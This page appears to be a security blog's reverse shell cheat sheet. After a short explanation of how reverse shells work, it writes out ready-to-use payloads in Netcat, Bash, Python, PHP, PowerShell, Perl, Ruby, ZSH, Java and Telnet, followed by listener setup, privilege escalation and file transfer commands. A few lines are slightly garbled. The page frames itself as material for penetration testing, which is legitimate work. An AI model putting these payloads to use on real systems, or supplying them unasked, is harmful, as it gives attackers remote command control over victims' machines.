Reverse Shell Cheat Sheet Header

What is a Reverse Shell?

A reverse shell is a type of shell in which an attacker establishes a connection to the victim’s system and gets access to its command prompt. Unlike a traditional shell, where the user interacts with the system by typing commands into a terminal, in a reverse shell scenario, the connection is initiated by the compromised system and is directed back to the attacker.

However, it’s important to note that ethical hackers, also known as penetration testers, may use reverse shells as part of security assessments to identify and fix vulnerabilities before malicious actors can exploit them. This cheat sheet provides a quick reference guide for individuals involved in penetration testing, ethical hacking, or other cybersecurity activities where understanding and implementing reverse shells is necessary. It includes commands and techniques for creating, delivering, and exploiting reverse shells.

How Does a Reverse Shell Work?

A reverse shell operates by creating a connection between the target system and the attacker’s machine. Typically, the target machine initiates this connection by sending a request to the attacker’s machine. Once established, the attacker’s machine assumes the role of a listener, anticipating commands from the attacker.

To create a reverse shell, the attacker initiates the creation of a shell payload programmed to connect back to their machine. Various tools and programming languages, such as Metasploit, Bash, Netcat, and PHP can be utilized for this purpose. After crafting the payload, it is commonly delivered to the target machine through vulnerabilities or social engineering methods.

Upon execution of the payload on the target machine, it establishes a connection back to the attacker’s machine. Once the connection is active, the attacker gains access to a shell session, enabling the execution of commands on the target machine, retrieval of files and data, and potential escalation of privileges if needed.

Here’s a step-by-step explanation of the various stages of operation:

  • Listener Setup: The attacker sets up a listener on their machine, usually using a tool like Netcat (nc) or any other network socket listening tool. The listener waits for incoming connections on a specified port.
  • Payload Generation: The attacker creates a payload, which is a piece of code that, when executed on the target machine, establishes a connection back to the attacker’s machine.
  • Payload Execution on the Target: The attacker needs a way to execute the payload on the target machine. This can be done through various means, such as exploiting vulnerabilities, social engineering, or injecting the payload into a target system.
  • Connection Back to Attacker: Once the payload is executed on the target machine, it initiates a connection back to the attacker’s machine. This connection is typically a TCP or UDP connection.
  • Shell Interaction: After the connection is established, the attacker gains a shell on the target machine. This shell allows the attacker to interact with the target system’s command-line interface as if they were physically present on the machine.
  • Data Transfer: Data is transferred between the attacker and the target through the established connection. This includes commands sent by the attacker to the target and the corresponding output sent back from the target to the attacker.
  • Remote Control: The attacker can now remotely control the target machine, execute commands, manipulate files, and perform various actions as if they had direct access to the system.

View or Download the Cheat Sheet JPG image

Right-click on the image below to save the JPG file (1031w x 2500h in pixels), or click here and open it in a new browser tab. Once the image opens in a new window, you may need to click on the image to zoom in and view the full-sized jpeg.

Reverse Shell Cheat Sheet

View or Download the cheat sheet PDF file

You can download the cheat sheet Reverse Shell Cheat Sheet.pdf here. If it opens in a new browser tab, simply right click on the PDF and navigate to the download selection.

What’s included in the Cheat Sheet

The following categories and items have been included in the cheat sheet:

Creating a Reverse Shell

Multiple tools and programming languages are available for crafting a reverse shell payload. Here are a few examples:

Netcat
nc -e /bin/sh
Bash
bash -i >& /dev/tcp// 0>&1
Python
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("",))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])
PHP 
php -r '$sock=fsockopen("",);exec("/bin/sh -i <&3 >&3 2>&3");'
ZSH
zsh -c 'zmodload zsh/net/tcp && ztcp && zsh >&$REPLY 2>&$REPLY 0>&$REPLY'
PowerShell
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('',);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
Perl 
perl -e 'use Socket;$i="$ENV{}";$p=$ENV{};socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
Ruby 
ruby -rsocket -e 'exit if fork;c=TCPSocket.new(ENV[""],ENV[""]);while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
Java
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
Telnet
TF=$(mktemp -u); mkfifo $TF && telnet 0<$TF | /bin sh 1>$TF

Using a Reverse Shell

Listener Setup (Attacker's Machine)Payload Generation (Target Machine)Execution on the Target MachineConnection Back to AttackerRemote ControlReplace IP and Port
Netcat (nc) Reverse Shell
Bash: nc -lvp Bash: /bin/bash -c "/bin/bash -i > /dev/tcp// 0<&1 2>&1"Execute the payload on the target machine through a vulnerability or social engineering.The target machine initiates a connection back to the attacker's machine.Upon successful connection, the attacker gains a shell on the target.
Interact with the shell to execute commands and manipulate the target system.		Replace and with the actual IP address and port
Python Reverse Shell
Bash: nc -lvp Python:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'		Execute the payload on the target machine through a vulnerability or social engineeringThe target machine initiates a connection back to the attacker's machineUpon successful connection, the attacker gains a shell on the target.
Interact with the shell to execute commands and manipulate the target system.		Replace and with the actual IP address and port
PHP Reverse Shell
Bash:
nc -lvp 		php:
php -r '$sock=fsockopen("",);exec("/bin/sh -i <&3 >&3 2>&3");'		Execute the payload on the target machine through a vulnerability or social engineeringThe target machine initiates a connection back to the attacker's machineUpon successful connection, the attacker gains a shell on the target.


Interact with the shell to execute commands and manipulate the target system.		Replace and with the actual IP address and port

Ruby Reverse Shell
Bash:
nc -lvp 		Ruby: 
ruby -rsocket -e'f=TCPSocket.open("",).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'		Execute the payload on the target machine through a vulnerability or social engineeringThe target machine initiates a connection back to the attacker's machineUpon successful connection, the attacker gains a shell on the target.


Interact with the shell to execute commands and manipulate the target system		Replace and with the actual IP address and port

Bash Reverse Shell
Bash:
nc -lvp 		bash -i >& /dev/tcp// 0>&1Execute the payload on the target machine through a vulnerability or social engineering.The target machine initiates a connection back to the attacker's machineUpon successful connection, the attacker gains a shell on the target.


Interact with the shell to execute commands and manipulate the target system		Replace and with the actual IP address and port

Employing a Reverse Shell

After creating a reverse shell payload and establishing a connection with the target machine, the shell session becomes a tool for executing commands and conducting diverse actions on the target system. Below are several helpful commands and usage examples:

Command NameDescriptionUsage Example

Navigation and File Operations
ls (List)Lists files and directoriesls (list files and directories in the current folder)
cd (Change Directory)Changes the current working directorycd Documents (move to the "Documents" directory)
cp (Copy)Copies files or directoriescp file.txt /destination/folder (copy to a specified folder)
mv (Move/Rename):Moves or renames files or directoriesmv oldfile.txt newfile.txt (rename)


mv file.txt /new/location/ (move)
rm (Remove)Deletes files or directoriesrm file.txt (delete a file)
pwd (Print Working Directory)Display the current working directorypwd (show the current working directory)
find (Find Files and Directories)Search for files and directories in a directory hierarchy.find /path/to/search -name "filename" (search for a specific file).
chmod (Change Mode)Change file permissionschmod +x script.sh (add execute permission to a script).
chown (Change Owner)Change the owner of a file or directorychown user:group myfile.txt (change owner and group)

Privilege Escalation and File Transfer
SudoList available sudo commands for the current usersudo -l
SudoRun a command with elevated privilegessudo
Switch userSwitch to the root user.su
Switch userSwitch to the root user with elevated privileges. sudo su
wget Download a file from the internetwget
curl Download a file from the internetcurl
netcatReceive a file over the network using netcatc -l >
netcatSend a file over the network using netcatnc <

Networking
ping (Ping)Test network connectivityping example.com
ifconfig (Interface Configuration)Display/configure network interfacesifconfig -a (show all interfaces)
netstat (Network Statistics)Show network connectionsnetstat -an (display all active network connections)
route (Display or Modify Routing Table)Display or modify the IP routing table.route -n (display routing table)
traceroute (Trace Route)Display the route that packets take to reach a destinationtraceroute example.com (trace the route to a domain)
Nmap (Network Map)Scan a network for open ports and servicesnmap
nslookup (Name Server Lookup)Query DNS servers for domain name informationnslookup example.com (lookup domain information)
ARP Display ARP tablearp -a
ssh (Secure Shell)Connect to a remote server securely.ssh username@remotehost (connect to a remote server).
scp (Secure Copy)Copy files securely between hosts.scp file.txt username@remotehost:/path/to/destination (securely copy a file).

Concluding Remarks

The above Reverse Shell Cheat Sheet serves as an invaluable resource for those seeking to strengthen their cybersecurity arsenal and proficiency. It empowers both beginners and experienced security professionals with an in-depth understanding of reverse shells across various programming languages and techniques. The cheat sheet also accelerates the learning curve associated with Reverse Shell command-line operations, allowing you to perform tasks more efficiently and troubleshoot issues effectively.

However, it’s important to note that the use of reverse shells should always comply with legal and ethical standards. Unauthorized access to computer systems is illegal, and reverse shells should only be used in environments where explicit permission has been granted for security testing or educational purposes.

Latest Posts
Vendor Spotlight: Pandora FMS November 7, 2024 / by Stephen Cooper Vendor Spotlight: Cacti November 7, 2024 / by Stephen Cooper Vendor Spotlight: Icinga November 7, 2024 / by Stephen Cooper Vendor Spotlight: Nagios November 7, 2024 / by Stephen Cooper
Popular Posts
The Best Free TFTP Servers for Windows, Linux and Mac February 28, 2019 / by Jon Watson The Best SFTP and FTPS Servers February 27, 2019 / by Jon Watson The Best NetFlow Analyzers & Collector Tools for 2024 January 23, 2019 / by John Kimball The Best Bandwidth Monitoring Tools to Analyze Network Traffic Usage December 21, 2018 / by John Kimball